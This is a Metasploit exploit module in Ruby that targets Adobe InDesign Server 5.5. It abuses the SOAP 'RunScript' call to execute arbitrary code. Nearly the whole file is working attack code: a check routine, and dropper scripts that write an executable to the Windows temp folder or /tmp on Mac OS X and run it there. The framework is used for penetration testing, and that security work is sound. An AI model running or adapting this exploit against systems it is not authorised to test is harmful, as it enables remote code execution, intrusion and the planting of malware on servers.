rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/indesign_server_soap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
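class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Registers the module metadata, the two supported targets (Windows x64 and
  # Mac OS X x64) and the default remote port.
  #
  # @param info [Hash] metadata merged into this module's defaults by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',
        'Description' => %q{
          This module abuses the "RunScript" procedure provided by the SOAP interface of
          Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).

          The exploit drops the payload on the server and must be removed manually.
        },
        'Author' => [
          'h0ng10' # Vulnerability discovery / Metasploit module
        ],
        'License' => MSF_LICENSE,
        'Privileged' => false,
        'DisclosureDate' => '2012-11-11',
        'References' => [
          [ 'OSVDB', '87548'],
          [ 'URL', 'http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/' ]
        ],
        'Targets' => [
          [
            'Indesign CS6 Server / Windows (64 bits)',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'win'
            }
          ],
          [
            'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',
            {
              'Arch' => ARCH_X64,
              'Author' => 'juan vazquez',
              'Platform' => 'osx'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          # The payload file is written to the target and never deleted by
          # this module (see Description), so record the on-disk artifact.
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([ Opt::RPORT(12345) ])
  end

  # Wraps a script in an IDSP:RunScript SOAP envelope and POSTs it to '/'.
  #
  # Only '&' is entity-escaped before the script is placed in the XML body;
  # any '<' or '>' in script_code reaches the envelope unescaped. The caller's
  # string is left unmodified.
  #
  # @param script_code [String] script text placed in IDSP:scriptText
  # @param script_type [String] value placed in IDSP:scriptLanguage
  # @return [Object, nil] the result of send_request_cgi (5 is passed as its
  #   second argument); callers in this file treat nil as "no response"
  def send_soap_request(script_code, script_type)
    # Non-destructive gsub: the original gsub! silently rewrote the caller's string.
    escaped_code = script_code.gsub(/&/, '&amp;')
    soap_xml = %(
      <?xml version="1.0" encoding="UTF-8"?>
      <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">
      <SOAP-ENV:Body>
      <IDSP:RunScript>
      <IDSP:runScriptParameters>
      <IDSP:scriptText>#{escaped_code}</IDSP:scriptText>
      <IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>
      </IDSP:runScriptParameters>
      </IDSP:RunScript>
      </SOAP-ENV:Body>
      </SOAP-ENV:Envelope>
    )

    send_request_cgi({
      'uri' => '/',
      'method' => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'data' => soap_xml
    }, 5)
  end

  # Asks the service to run a one-line javascript that returns a random
  # 10-digit marker, and looks for that marker in the SOAP reply.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is echoed back,
  #   Unknown when no response was received, Safe otherwise
  def check
    # Use a very simple javascript
    check_var = rand_text_numeric(10)
    checkscript = "returnValue = \"#{check_var}\""

    res = send_soap_request(checkscript, 'javascript')

    # Without a response nothing can be concluded; the original dereferenced
    # res.body here and raised NoMethodError on nil.
    return Exploit::CheckCode::Unknown if res.nil?

    expected = "<data xsi:type=\"xsd:string\">#{check_var}</data>"
    return Exploit::CheckCode::Vulnerable if res.body.to_s.include?(expected)

    Exploit::CheckCode::Safe
  end

  # Builds a target-specific dropper script, submits it through RunScript and
  # reports where the payload file was left so it can be cleaned up.
  #
  # Artifacts, as written by the scripts below:
  # * Windows: a randomly named 8-letter upper-case .exe in the folder returned
  #   by FileSystemObject.GetSpecialFolder(2). It is not deleted.
  # * Mac OS X: /tmp/<random>.txt (removed by the script itself) and an
  #   executable /tmp/<random> file, which is not deleted.
  def exploit
    case target.name
    when /Windows/
      print_status('Creating payload vbs script')
      encoded_payload = generate_payload_exe.unpack('H*').join
      exe_file = Rex::Text.rand_text_alpha_upper(8) + '.exe'
      wsf = Rex::Text.rand_text_alpha(8)
      payload_var = Rex::Text.rand_text_alpha(8)
      exe_name_var = Rex::Text.rand_text_alpha(8)
      file_var = Rex::Text.rand_text_alpha(8)
      byte_var = Rex::Text.rand_text_alpha(8)
      shell_var = Rex::Text.rand_text_alpha(8)

      # This one creates a smaller vbs payload (without deletion)
      vbs = %{
        Set #{wsf} = CreateObject("Scripting.FileSystemObject")
        #{payload_var} = "#{encoded_payload}"
        #{exe_name_var} = #{wsf}.GetSpecialFolder(2) + "\\#{exe_file}"
        Set #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)
        For x = 1 To Len(#{payload_var})-3 Step 2
        #{byte_var} = Chr(38) & "H" & Mid(#{payload_var}, x, 2)
        #{file_var}.write Chr(#{byte_var})
        Next

        #{file_var}.write Chr(#{byte_var})
        #{file_var}.close

        Set #{shell_var} = CreateObject("Wscript.Shell")
        #{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False
        Set #{shell_var} = Nothing
        returnValue = #{exe_name_var}
      }
      # vbs = Msf::Util::EXE.to_exe_vbs(exe)
      print_status('Sending SOAP request')

      res = send_soap_request(vbs, 'visual basic')
      fallback = "#{exe_file} in the server's temporary folder"
      if res.nil?
        # The original printed nothing here, leaving a possible artifact unreported.
        print_warning "No response; if the script ran, the payload is #{fallback}, please remove manually"
      else
        warn_about_dropped_file(res, fallback)
      end

    when /Mac OS X/
      print_status('Creating payload apple script')

      exe_payload = generate_payload_exe
      b64_exe_payload = Rex::Text.encode_base64(exe_payload)
      b64_payload_name = rand_text_alpha(rand(5..9))
      payload_name = rand_text_alpha(rand(5..9))

      apple_script = %(
        set fp to open for access POSIX file "/tmp/#{b64_payload_name}.txt" with write permission
        write "begin-base64 644 #{payload_name}\n#{b64_exe_payload}\n====\n" to fp
        close access fp
        do shell script "uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt"
        do shell script "rm /tmp/#{b64_payload_name}.txt"
        do shell script "chmod +x /tmp/#{payload_name}"
        do shell script "/tmp/#{payload_name}"
        set returnValue to "/tmp/#{payload_name}"
      )

      print_status('Sending SOAP request')

      res = send_soap_request(apple_script, 'applescript')

      print_status "No response, it's expected" if res.nil?
      warn_about_dropped_file(res, "/tmp/#{payload_name}")
    end
  end

  private

  # Prints the cleanup warning for the payload file left on the target.
  #
  # Uses the path echoed back in the scriptResult element when there is one and
  # falls back to the locally known location otherwise, so the warning never
  # shows an empty path.
  #
  # @param res [Object, nil] response from send_soap_request
  # @param fallback_path [String] location to report when the reply has no path
  def warn_about_dropped_file(res, fallback_path)
    reported = res&.body.to_s[%r{<data xsi:type="xsd:string">(.*)</data></scriptResult>}, 1]
    location = reported.to_s.empty? ? fallback_path : reported
    print_warning "Payload deployed to #{location}, please remove manually"
  end
end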